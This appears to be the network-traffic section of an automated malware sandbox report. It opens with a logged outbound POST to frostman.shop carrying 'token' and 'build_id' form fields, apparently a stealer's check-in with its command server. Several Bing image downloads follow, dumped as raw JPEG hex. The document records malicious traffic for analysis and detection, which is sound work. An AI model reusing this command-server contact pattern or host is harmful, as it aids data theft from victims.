                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:15 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----1DBAI5X4OZU3EUASRQ16
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                Host: frostman.shop
                                                                                                                                                                                                                                                                                                Content-Length: 6657
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:15 UTC6657OUTData Raw: 2d 2d 2d 2d 2d 2d 31 44 42 41 49 35 58 34 4f 5a 55 33 45 55 41 53 52 51 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 39 66 35 66 34 30 37 33 38 63 35 64 63 33 66 31 38 66 39 36 37 36 65 66 30 36 39 34 38 66 0d 0a 2d 2d 2d 2d 2d 2d 31 44 42 41 49 35 58 34 4f 5a 55 33 45 55 41 53 52 51 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 31 44 42 41 49 35 58 34 4f 5a 55 33 45 55 41 53 52 51 31 36 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------1DBAI5X4OZU3EUASRQ16Content-Disposition: form-data; name="token"889f5f40738c5dc3f18f9676ef06948f------1DBAI5X4OZU3EUASRQ16Content-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------1DBAI5X4OZU3EUASRQ16Cont
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:16 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                15192.168.2.649749150.171.27.10443
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:15 UTC346OUTGET /th?id=OADD2.10239381681310_13V04GE58D8UEEUDW&pid=21.2&c=3&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                                                Host: tse1.mm.bing.net
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:15 UTC856INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                Content-Length: 733061
                                                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                                                                                                NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                X-MSEdge-Ref: Ref A: A9825D2740A349CDAAB3B24D9AAF07B2 Ref B: EWR311000103025 Ref C: 2024-12-20T06:31:15Z
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:15 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:15 UTC15528INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 04 02 03 03 03 02 04 03 03 03 04 04 04 04 05 09 06 05 05 05 05 0b 08 08 06 09 0d 0b 0d 0d 0d 0b 0c 0c 0e 10 14 11 0e 0f 13 0f 0c 0c 12 18 12 13 15 16 17 17 17 0e 11 19 1b 19 16 1a 14 16 17 16 ff db 00 43 01 04 04 04 05 05 05 0a 06 06 0a 16 0f 0c 0f 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                                                                                                                                                                                Data Ascii: JFIFCC8"}!1AQa"q2
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC16384INData Raw: ca 2d c3 77 a8 a4 20 f7 ab 72 05 f5 a8 64 d8 2b a6 32 38 67 12 bb 67 1c 35 37 7e 7a f5 a7 48 ca 3b d5 79 24 00 f0 6b 78 ea 73 4f 42 77 e0 52 67 15 59 ae 38 c5 22 cc 6a f9 59 93 94 6e 5a ce 7a d1 b4 75 15 1c 47 72 f5 a7 a9 1d e9 16 95 c4 c7 3d 6a 65 c1 5e b5 1b 62 90 96 0b c0 cd 2b dc b4 ac 2c 88 0a fb d5 4b 84 3d aa d2 96 ea 54 d0 c8 5f b1 aa 8c f9 59 35 29 29 2d 0c 89 a1 66 e6 a1 5b 66 cf e3 5b 86 d0 74 cf 5a 6b 5a aa 73 5d 0b 10 79 f3 c0 5d de c6 52 5b 31 ed 4a d6 27 1c 0a d2 08 07 41 47 5e 28 f6 d2 27 ea 70 b6 a6 7c 7a 7a b2 fc c2 9a da 6a 74 e6 b5 4a ed 1d 29 08 ef 9a 5e de 5d c6 f0 34 ad aa 32 5b 4f 51 c0 5a 86 6b 40 8b c8 ad 79 08 1c e6 ab dc 05 61 8c 7e b5 b4 6b 4a e7 2d 5c 1d 2b 3b 23 24 aa 8e 36 d2 84 27 a0 ab c2 14 cd 0e a1 7a 2d 6d ed 8e 2f a9
                                                                                                                                                                                                                                                                                                Data Ascii: -w rd+28gg57~zH;y$kxsOBwRgY8"jYnZzuGr=je^b+,K=T_Y5))-f[f[tZkZs]y]R[1J'AG^('p|zzjtJ)^]42[OQZk@ya~kJ-\+;#$6'z-m/
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC16384INData Raw: 64 66 f5 ad 20 a5 73 29 b8 a4 4c c5 69 bb 80 ed 55 83 90 79 a7 6f f7 ae b5 b1 c7 2b 32 6d d4 8d 93 49 1b 0c f3 4e 79 13 6e 07 5a b8 c9 98 ca 29 8d d9 47 96 b8 a6 b4 a0 53 4c d5 af 3b 39 5d 34 32 78 c1 aa b3 45 8e d5 66 49 b1 d2 a0 96 52 46 2a d3 66 2e c8 a9 74 87 67 ca 2b 3e 46 5d a5 64 40 6b 42 69 1f 3d 2a ac c9 bf a8 e6 aa c4 a9 d8 cb b8 54 0c 46 de 3b 55 56 5c 37 03 15 ad 25 be 4d 45 2d b0 c6 45 65 38 26 77 61 f1 4e 25 04 96 55 eb d2 a5 6b a0 cb d6 92 64 07 e5 aa 57 0a 50 f0 6b 96 58 74 cf 52 9e 63 6d 0d 1b 5b 93 bb 19 ab 84 6f 8c 9a c4 b3 2d b8 7d 6b 5e d6 4c ae d3 d2 b8 71 14 f9 1e 87 b1 83 af ed 56 a7 39 af 2b 79 dd 2b 1b 63 19 30 01 ae d2 ea cd 67 73 91 f8 d5 4f ec 6d ac 58 0a eb a3 8e 84 23 66 70 e2 b2 b9 d5 a9 cc b6 31 2d ad db 03 35 61 61 0b c9
                                                                                                                                                                                                                                                                                                Data Ascii: df s)LiUyo+2mINynZ)GSL;9]42xEfIRF*f.tg+>F]d@kBi=*TF;UV\7%ME-Ee8&waN%UkdWPkXtRcm[o-}k^LqV9+y+c0gsOmX#fp1-5aa
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC16384INData Raw: 3d 15 dc 9e 8c 33 f3 71 d4 f5 e6 b3 b5 ef 0e 5e 26 b4 6e 34 dd 1a ea e3 4f 37 41 2d 46 e0 cd 20 24 85 43 dc e4 8e 0e 39 04 57 4f e1 e8 ad b4 eb 39 62 d7 ec b5 af 0f 4b 7c 25 81 a4 8e 0d f6 f2 a7 1f bb 96 37 1b 64 e9 db 90 47 38 eb 5d d5 bd 92 a5 a2 df 57 cb a3 f9 a5 a9 ad d5 ae 6d 78 7b c7 3a 5f 85 5a 7b 7f 03 78 93 c4 cb a7 4d 36 f3 e5 59 20 9a cd 46 1d 65 8b 92 37 13 b9 4e 70 70 39 c8 35 83 73 a8 eb 7a f7 89 75 1d 7b c3 9e 22 8a 69 2f 59 2d e6 57 68 ed ae 2e 19 f7 31 22 19 0e 0e 02 fc cc a7 8c f1 c1 ad 2d 53 fe 13 bb cf 32 0d 23 50 d2 8e 87 0c 11 b0 b3 b6 78 2c cc 51 f2 11 54 b8 0f d8 f2 49 ee 0d 64 f8 22 c6 cb 45 f1 ec 9a 7f 89 fc 39 6b a8 dd 0b 71 12 da 6e f3 63 32 30 0d 82 14 75 c0 04 10 76 f3 dc 1a e0 a5 1a 50 84 ea 59 39 5a f6 ba 93 ff 00 b7 93 51
                                                                                                                                                                                                                                                                                                Data Ascii: =3q^&n4O7A-F $C9WO9bK|%7dG8]Wmx{:_Z{xM6Y Fe7Npp95szu{"i/Y-Wh.1"-S2#Px,QTId"E9kqnc20uvPY9ZQ
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC16384INData Raw: 91 21 b3 64 8f 0b 3a a8 32 22 f2 76 c6 c4 65 53 1d 54 70 7a f5 ac dd 18 b6 a7 d4 f0 25 39 7c 28 d9 92 f0 db eb f3 6a 17 9a c4 26 e3 52 d4 d9 dc ed 56 55 25 32 58 95 fb ad 83 9f 4c 8e 6a cc ba d4 16 1e 1b 6f 0d e9 d7 4b ac 69 d6 92 dc 48 62 be 68 de dd 1e 72 84 cd 6b 20 1b a3 98 85 c1 3c f4 23 6e 33 5c 9e be 97 45 52 28 e3 b8 6d 4b ec 23 ed b2 04 57 8a 7d c7 1b 97 1d 88 3c 30 ee 2a bd 95 ed fe 93 63 67 77 a5 6a ed 63 73 62 fc 2c 24 79 8d bb 87 72 08 21 b2 0e 30 7d 2b 39 c5 39 35 1d 1f 50 8b e5 b1 73 54 d5 97 4a d6 63 75 6f b3 ea 3a 5c 81 9a de e2 05 58 e1 8b 19 09 b0 73 b7 9e 84 9c 8e 6a af 89 3c 49 7b e2 58 74 e8 3e cb a4 af 97 24 92 db 35 ac 46 37 72 cd f3 2b 9f e2 19 1c 16 f9 86 2b 0f 54 fe cb bb 6b 89 ee 59 a3 9c dc ab b6 f6 2c 5a 2c 61 b1 d9 4f 7c 1e
                                                                                                                                                                                                                                                                                                Data Ascii: !d:2"veSTpz%9|(j&RVU%2XLjoKiHbhrk <#n3\ER(mK#W}<0*cgwjcsb,$yr!0}+995PsTJcuo:\Xsj<I{Xt>$5F7r++TkY,Z,aO|
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC16384INData Raw: 59 04 aa 88 47 5d bc fe 27 b5 59 b6 d8 8a 64 91 62 92 32 39 24 9c 1f fe b5 17 0d 8a 5f ba 64 54 10 36 55 c1 f5 ca ff 00 9f e7 50 b5 a8 9e fc cc ac ca 63 ca 9d d1 ec cd 5b 59 2c e3 ba 69 22 2c 87 fe 59 85 e4 2f b0 a7 ea 33 2b 95 51 12 c8 9d 4b 67 91 45 c0 84 cc ad 1f 94 ea a5 55 81 ea 77 63 1d 33 e9 51 c8 1d ce 4b 2e 33 91 8e a2 ad 62 23 23 ce f0 24 7b 8f 08 a7 0a 38 f4 a6 43 13 49 f2 f9 91 e5 8f 7f e5 8a 9b b6 1c a5 76 0c 1b fd 9d df 37 1d 3e b5 06 f4 96 e0 c6 09 6f 9b fe 59 8c 9f c2 ac c9 01 46 da 5d be 5e 00 cf 5a 12 41 6f 07 ee 95 93 69 fb ab d7 eb 9e d4 05 8a de 4a 3a 92 24 f9 a3 e8 b8 3b 88 a9 23 78 bc 98 d5 f7 06 66 f9 d7 60 e9 ea 3d ea 45 97 fd 1e 49 cf 32 e7 e5 23 d3 eb 51 c2 ad 2b c6 cc ea a1 db 05 9b f8 47 a9 a0 61 1a 6e 6d 9d 3b 8c 81 c8 f5 f6
                                                                                                                                                                                                                                                                                                Data Ascii: YG]'Ydb29$_dT6UPc[Y,i",Y/3+QKgEUwc3QK.3b##${8CIv7>oYF]^ZAoiJ:$;#xf`=EI2#Q+Ganm;
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC16384INData Raw: ea c3 eb 5b c7 2f a7 7b a6 73 4b 35 ab 15 67 13 c6 35 07 36 8c 52 fe ca 18 2f a5 93 9b 97 6f 9a e8 63 ef 90 3e e6 78 3c 64 73 d8 d7 a1 7c 3b 68 35 2d 36 4d 2e 08 64 3a 9d ad c8 bc 86 76 54 89 6d 6d f8 59 92 35 1f 7c 80 73 82 70 41 ae 43 45 d3 34 cd 5b c3 f1 dc 6a 52 dd 4c b6 f2 3e 60 59 46 d6 0c 0f cc 33 86 46 05 7a f2 0f a0 ae b7 c1 3a 44 9e 1a f0 fb 5a 6a 90 5c 4d 75 76 7c f5 96 de 65 69 21 40 a3 09 2c 64 1c ab a9 dd b8 1e 08 1c 76 af ba ab 5e 10 4d bd cf c0 3d 9f 3e 97 23 f1 65 b6 a5 6d 63 15 cc 37 da 44 fa 65 8a 9b 23 72 c2 35 90 12 49 f2 a4 84 7c c5 b0 37 03 c8 c6 71 d2 bb cf 84 fe 0c d6 b5 dd 23 49 d5 2d ed 61 d3 74 7d f2 2e a1 78 64 89 3c b8 f2 bb 86 1f 94 91 80 dc 17 91 80 48 20 d6 3d af 8c 3c 25 a1 36 9d 63 e2 1f 0a de 5a 43 72 5e 7b 4d 62 2b 24
                                                                                                                                                                                                                                                                                                Data Ascii: [/{sK5g56R/oc>x<ds|;h5-6M.d:vTmmY5|spACE4[jRL>`YF3Fz:DZj\Muv|ei!@,dv^M=>#emc7De#r5I|7q#I-at}.xd<H =<%6cZCr^{Mb+$
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC16069INData Raw: ab 67 a1 fe 58 a4 3e 53 0e 23 1a 90 51 4a ca 3a 70 46 3f 3a 9e c6 d6 59 ee e2 13 4b 22 5b 3b 0d ee 8a 4e d2 4e 0f 1d f1 fd 2b 66 48 60 33 2b dd 0c 22 46 10 8c 67 a0 c0 6c f7 3e b5 5b fb 52 ce e2 fe 0b 45 9a 48 59 08 85 a5 0a aa ad 18 e8 4f 7d fe a7 be 05 32 b9 6c 76 36 3e 01 d0 22 11 bd bd f5 e5 ec 8a e0 4c 8a a2 3e 08 fe 13 ef d8 fe 06 b0 7c 71 a1 e9 76 3f 61 b8 d3 7c d5 83 cf db 3c 73 c9 93 f5 42 7a f3 d4 76 35 b9 e2 0d 5e ca c6 66 9a 7b db 7b a9 bc ad 85 ed 41 66 6c 74 6e 38 19 ee 3d 6b 1a e3 c6 17 5a 8c db a7 d3 11 2d be cc 61 58 d5 06 03 e7 2b 26 1b 81 c7 04 0e bd 6b 38 df 72 9f 2e c3 6e f5 bb 4d 35 8d b8 0d 71 03 e1 8a c8 a3 e5 71 c8 60 87 a1 e4 82 7a e0 f1 59 1a 94 d6 d7 1a 91 d4 6d e0 92 38 da 36 f2 6d d9 c1 c0 3d 89 f6 aa fa ab 5c 5e b2 b5 c4 4a
                                                                                                                                                                                                                                                                                                Data Ascii: gX>S#QJ:pF?:YK"[;NN+fH`3+"Fgl>[REHYO}2lv6>"L>|qv?a|<sBzv5^f{{Afltn8=kZ-aX+&k8r.nM5qq`zYm86m=\^J
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC16384INData Raw: f5 38 e2 ba e1 82 ca ba 62 1f dc 69 1a 14 e3 f0 c9 3f 99 e9 2b a9 e9 08 b9 7d 76 c5 3b 8d d7 6b cf eb e9 52 af 88 74 14 8b 73 78 9b 4d 0b eb f6 c1 5e 67 ff 00 0a 89 d4 95 7d 7b 4d dc 3a a2 38 2d f4 02 aa b7 c2 99 7c cc 0d 40 11 d8 f9 63 f9 66 a9 60 72 d9 7f cb f7 f7 1a 7d 5f 9f 6f cd 1e aa de 25 d0 d5 cc 67 c4 96 59 1d 71 76 a7 fa d4 17 1e 20 d2 36 e5 35 e8 e4 cf 4f 2a 60 7f ad 79 87 fc 2a 5d 40 36 d1 3c 25 41 ea 4a a8 3f ad 47 3f c2 9d 54 12 61 9e cb e8 d7 2a 0f e9 56 b2 ec b2 fa 57 fc 0b 8e 1a 31 d5 a5 f7 a3 d5 f4 cd 66 de 49 3e 4b b9 64 5f 55 98 37 f5 ae 8a ce 68 24 8d 4f 9f 9c f4 fd e0 fe 59 af 9f db e1 a6 b9 08 e1 60 66 fe f4 5a 90 50 3f 0c 54 7f f0 ae 35 e6 6c 07 b3 53 9f e3 d4 98 93 f8 01 51 53 29 c1 4f 6c 42 5f 2f f8 26 75 70 b1 9e ca c7 bd ea 5a
                                                                                                                                                                                                                                                                                                Data Ascii: 8bi?+}v;kRtsxM^g}{M:8-|@cf`r}_o%gYqv 65O*`y*]@6<%AJ?G?Ta*VW1fI>Kd_U7h$OY`fZP?T5lSQS)OlB_/&upZ
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC16384INData Raw: e5 8d 8d b6 5a 10 33 cc 61 f2 8c b2 18 c3 67 68 27 69 3f de c7 4c e3 bd 4f 6b a8 5f 59 32 b5 94 cd 6d 2a 36 32 b8 dc d9 f6 a6 aa 18 a2 37 0f a8 c5 f2 80 a3 1c f9 63 3f dd a6 db 49 63 6e f2 24 c8 d7 2b 2a 6d 49 0f 67 c8 c1 cf 6f 7a 4f 50 be 85 db 3b 99 a2 91 25 55 92 e2 39 24 67 90 c6 48 91 5c f5 cb 0e 41 cf e1 cd 5e 67 ba 83 49 17 17 d0 ed 79 a5 64 c7 0a 72 46 30 ca 7a 37 1c 9e 99 a7 5a 94 b5 ba d4 15 6e 3c eb 51 6f c4 d0 20 1b d8 72 16 41 9e e3 20 9e bc 66 b4 bc 4d 7b a2 6a da 2d c4 bf 69 6b ed 69 64 44 b3 45 3f 2c d1 32 8e 77 2e 33 22 10 c3 0d d4 1f 5a 8b 5d e8 47 36 bb 10 49 ad de ea 9e 2d b5 d4 b5 09 a3 22 e1 12 d6 6b 8b 7b 78 db 85 51 12 03 00 0a b9 18 50 7a 33 75 c9 27 35 d0 78 db 40 f1 07 83 e7 9e d7 54 d2 b4 fd 42 08 2c d4 7f 6a 69 33 35 cd a4 6f
                                                                                                                                                                                                                                                                                                Data Ascii: Z3agh'i?LOk_Y2m*627c?Icn$+*mIgozOP;%U9$gH\A^gIydrF0z7Zn<Qo rA fM{j-ikidDE?,2w.3"Z]G6I-"k{xQPz3u'5x@TB,ji35o


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                16192.168.2.649750150.171.27.10443
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:15 UTC375OUTGET /th?id=OADD2.10239317301222_1FJU5PIOORZE0KYBN&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                                                Host: tse1.mm.bing.net
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC854INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                Content-Length: 606760
                                                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                                                                                                NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                X-MSEdge-Ref: Ref A: 87148BD383854DB892C04DF014DC5F80 Ref B: EWR30EDGE0309 Ref C: 2024-12-20T06:31:15Z
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:15 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC15530INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 19 54 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 34 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 32 3a 30 38 3a 30 34 20 31 39 3a 35 32 3a 30 30 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 07 80 a0 03 00 04 00 00 00 01 00 00 04 38 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01
                                                                                                                                                                                                                                                                                                Data Ascii: JFIF``TExifMM*bj(1r2i``Adobe Photoshop 23.4 (Windows)2022:08:04 19:52:008
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC16384INData Raw: 05 73 17 e1 92 a5 8d ab 36 39 6a 68 e5 a4 d5 ca 52 b9 a9 1c b5 6a 06 ac 88 e5 ab 50 4f 52 d5 8d 63 25 d4 d1 dd ef 51 c9 2d 45 e6 d3 2a 6c 57 33 25 df 4f dd 55 e8 dd 45 82 e5 aa 74 6d 50 47 2d 3f 76 fa 96 ae 55 cb 51 b5 5c b5 96 b3 60 6a b5 03 54 1a a9 1a 91 cb 56 a0 9e b2 e0 6a b1 1b 54 33 68 9a fe 6d 26 ef 7a a3 03 54 fb e9 1a 26 4f bb de 89 1b 65 47 ba 8d d5 3c a3 6e e4 91 cf 53 47 3d 52 92 99 1f c9 52 09 d8 d7 8e 5a 3c dd f5 9d 1c b5 24 72 d4 94 9d cb 5b bd e9 b2 35 45 e6 d3 37 7b d0 31 f2 2c 6f 4d f2 a9 37 7b d1 bb de a8 4d 5c 36 d1 b6 8d de f4 f8 e8 17 28 47 52 ed a2 35 a7 6d a0 69 58 6d 58 8d aa bd 4b 1a d2 63 27 8d aa 37 a1 29 d1 c5 be 90 11 48 b5 14 9f 25 5a f2 a4 4a a5 71 fe ba 80 1f 1b 56 95 ad ce ff 00 92 b2 e9 d0 36 ca 00 de 82 5a b5 1c f5 8d
                                                                                                                                                                                                                                                                                                Data Ascii: s69jhRjPORc%Q-E*lW3%OUEtmPG-?vUQ\`jTVjT3hm&zT&OeG<nSG=RRZ<$r[5E7{1,oM7{M\6(GR5miXmXKc'7)H%ZJqV6Z
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC16384INData Raw: 89 ad ea 97 96 7a 7c 7f 69 78 2d a4 b2 96 1f b4 47 f2 6e 8e 59 a0 8f f8 9b fb f5 e5 9f da 10 5c 4d b3 c4 b3 5d dc 5f 5b ff 00 cb 4f 37 e4 fb 3f f1 79 7f ed 56 4f 9b 25 c5 df f6 5c f3 7e fe 39 7f d1 a4 f3 7e 4f fc 7a b5 63 b6 7f 12 f8 7e 49 e6 b3 86 39 e3 df 1d c7 97 2e cf de af f1 2d 4c aa 49 ab 33 19 28 37 7b 58 cd d6 27 82 2b a8 de cb 4d 8a cb cc 95 e4 ff 00 5d e7 3e d6 fb b1 b4 9f ec d4 9a 3d e4 71 4d be eb ce f3 ff 00 e5 9d 53 f2 a7 b7 9a c6 cb 54 b3 f2 e4 f3 3f d6 f9 bf f1 f0 95 72 ea ce 4b 4d 43 f7 1f bb ac 9b 72 46 8b 92 e6 d6 ef 2b e4 7f de 47 53 ee 8d 3e fd 12 4b 25 bf cf 51 49 2c 72 ff 00 cb 6f 2e 4a fa 23 e5 1d a3 27 72 59 25 df ff 00 4d 23 a8 a4 83 67 cf 05 1f bf 4a 76 e8 fc 9d e9 40 da 52 44 7b b7 d1 b6 3f 26 a4 91 77 fd fa 6e dd 94 13 cb dc
                                                                                                                                                                                                                                                                                                Data Ascii: z|ix-GnY\M]_[O7?yVO%\~9~Ozc~I9.-LI3(7{X'+M]>=qMST?rKMCrF+GS>K%QI,ro.J#'rY%M#gJv@RD{?&wn
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC16384INData Raw: f2 fc ff 00 dd c1 26 ff 00 dd 7f 05 52 ba d0 f6 4d 1f 91 34 32 79 9f ea ff 00 bf b2 a6 9c 60 96 d6 2e 52 7d 09 b4 ab 68 1f f7 e9 e4 db fd ff 00 de 4b 55 60 6f b2 6a 1e 46 97 37 da 2e a4 93 f7 77 35 24 8b 69 6f 0e c8 2c fc cf 2f fe 5a 7d fa cb 92 da 7f ed 68 ef 7f 75 6f 1c 9f f2 ce 2f bf ff 00 7c d5 a9 5d d9 b3 39 5d 22 c7 88 e2 d4 b4 79 bc f4 9a 6f f4 8f f9 69 14 bf eb 2b 22 0d 42 fe 59 be d4 9e 4f 99 ff 00 3d 2e 6b d6 23 f0 f4 1a 9e 9f 6d 75 fd 9b e6 4f a8 db 3d bd b7 9b 17 fa b9 76 7c 90 7a 57 9e 5d 68 b1 de fd 85 ed 74 d9 ad e7 f9 e3 b9 b6 ff 00 9e 6c af b7 fe fa ff 00 66 a9 ca 16 6e c8 55 29 b4 fd dd 8d ef 0c dc e9 b6 96 91 ea 37 b0 cd 71 7d fe b2 39 2e 62 ff 00 57 59 7e 2e f1 44 ef 34 8f e7 7e f2 4a 9f 55 89 2c a6 d9 75 fe b3 cb ff 00 57 ff 00 3d 3f
                                                                                                                                                                                                                                                                                                Data Ascii: &RM42y`.R}hKU`ojF7.w5$io,/Z}huo/|]9]"yoi+"BYO=.k#muO=v|zW]htlfnU)7q}9.bWY~.D4~JU,uW=?
